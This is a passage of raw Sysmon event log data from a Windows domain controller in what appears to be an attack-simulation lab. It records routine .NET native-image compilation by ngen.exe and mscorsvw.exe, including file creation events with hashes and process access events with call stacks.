21:07:06.793{4DB9351A-A27A-60D3-8805-00000000CF01}6856NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MQ1QNPQX05\Microsoft.Windows.FileServer.Management.Plugin.UI.ni.dll.auxMD5=95D3F6AD9854814BB074F94177DC1895,SHA256=3E907D394CB0EDBA4C155D7827AE7CF59350807067E409D6F0E11520C823BCF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023202Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.793{4DB9351A-A27A-60D3-8805-00000000CF01}6856NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MQ1QNPQX05\Microsoft.Windows.FileServer.Management.Plugin.UI.ni.dllMD5=1D5A75A7B95A247E157151DD4D6C56BD,SHA256=489C84192101C29A142A0610F43A1414F09B26DA90EE5E89AE48A19254D74C18,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023201Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.339{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27A-60D3-8805-00000000CF01}6856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023200Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.324{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27A-60D3-8805-00000000CF01}6856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023199Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.324{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27A-60D3-8805-00000000CF01}6856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023198Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.324{4DB9351A-A279-60D3-8705-00000000CF01}5960NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FUGFYSVA5A\Microsoft.Windows.FileServer.Management.Plugin.ni.dll.auxMD5=C1724E743C7AF9D7B10D64A311B0BF5A,SHA256=F1F69D03C325BD675B31289A5966B55949800E2C75E920F310DAF607AFE1B256,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023197Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.324{4DB9351A-A279-60D3-8705-00000000CF01}5960NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FUGFYSVA5A\Microsoft.Windows.FileServer.Management.Plugin.ni.dllMD5=C5608F24B372292E4D81D6246C1FA292,SHA256=E75077BEAE93572F979136A93DAE5F10D4F8103204C85893515B5066A369BE70,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023263Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.699{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27B-60D3-9405-00000000CF01}6956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023262Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.683{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27B-60D3-9405-00000000CF01}6956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023261Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.683{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27B-60D3-9405-00000000CF01}6956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023260Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.683{4DB9351A-A27B-60D3-9305-00000000CF01}6640NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JTM9HFONJO\Microsoft.Windows.ServerManager.NPASRole.Plugin.ni.dll.auxMD5=B165B9CC80ECBBCF987F572DAA8DF177,SHA256=08DAD8CC5DC5E47374436DF1AE63DA872C90692D0E8B0C6419E043126A793C42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023259Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.683{4DB9351A-A27B-60D3-9305-00000000CF01}6640NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\JTM9HFONJO\Microsoft.Windows.ServerManager.NPASRole.Plugin.ni.dllMD5=2EECFAA954CB3067C6B581547F686517,SHA256=6DB97DF497BF358338BB3168C6283FD22B5C5E4CCB3343E2E153064BE84929D4,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023258Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.668{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27B-60D3-9305-00000000CF01}6640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023257Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.636{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27B-60D3-9305-00000000CF01}6640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023256Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.636{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27B-60D3-9305-00000000CF01}6640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023255Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.636{4DB9351A-A27B-60D3-9205-00000000CF01}4276NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\790ETG5Q93\Microsoft.Windows.ServerManager.Ipam.Plugin.ni.dll.auxMD5=CCBBFD4CC6A82A490770A45916ADDBAB,SHA256=3344449579F764CBE8C11BEC352C3FD2F6DBFAD6B696EB816A014928B6608CC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023254Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.636{4DB9351A-A27B-60D3-9205-00000000CF01}4276NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\790ETG5Q93\Microsoft.Windows.ServerManager.Ipam.Plugin.ni.dllMD5=F61EAB241943C60A443B008F9434BFBD,SHA256=4D1777553E0F292188CD21B30849420489594E06010B69348F3CEB173E9878FB,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023253Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.621{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27B-60D3-9205-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023252Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.574{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27B-60D3-9205-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023251Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.574{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27B-60D3-9205-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023250Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.574{4DB9351A-A27B-60D3-9105-00000000CF01}1080NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QH11JG0B9Q\Microsoft.Windows.ServerManager.HyperV.Plugin.ni.dll.auxMD5=C5A3DF521B62C9D99A1F62CB1EEC1220,SHA256=4AC1B842AD6FDBE74ED0C287CE1ACF125F35B3A8D69E7E6536E51106B0F0443D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023249Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.574{4DB9351A-A27B-60D3-9105-00000000CF01}1080NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QH11JG0B9Q\Microsoft.Windows.ServerManager.HyperV.Plugin.ni.dllMD5=4C68E9B4E17953FA33695592630AF9F6,SHA256=ED3A9209CB88044DA07B057774E73EC20283ED05E7B0066524F39C347CCD688A,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023248Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.527{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27B-60D3-9105-00000000CF01}1080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023247Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.511{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27B-60D3-9105-00000000CF01}1080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023246Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.511{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27B-60D3-9105-00000000CF01}1080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023245Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.496{4DB9351A-A27B-60D3-9005-00000000CF01}5544NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\M16JZ7OPHC\Microsoft.Windows.ServerManager.FaxServer.Plugin.ni.dll.auxMD5=AFE75210251B3ECE1BBB24DC1604F41B,SHA256=C430E96FD6229B2D7B24551215EECFDA742B22B1EF7ACB6C98FDB366782C9FAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023244Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.496{4DB9351A-A27B-60D3-9005-00000000CF01}5544NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\M16JZ7OPHC\Microsoft.Windows.ServerManager.FaxServer.Plugin.ni.dllMD5=53D0BCFC2AAA5BBBDE3ABFA9F7137DD0,SHA256=1B04B57F66B4F2A5E75A357345B0CFD1AF2AB015B3AA878126F4C9281798A34E,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023243Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.480{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27B-60D3-9005-00000000CF01}5544C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023242Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.449{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27B-60D3-9005-00000000CF01}5544C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023241Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.449{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27B-60D3-9005-00000000CF01}5544C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.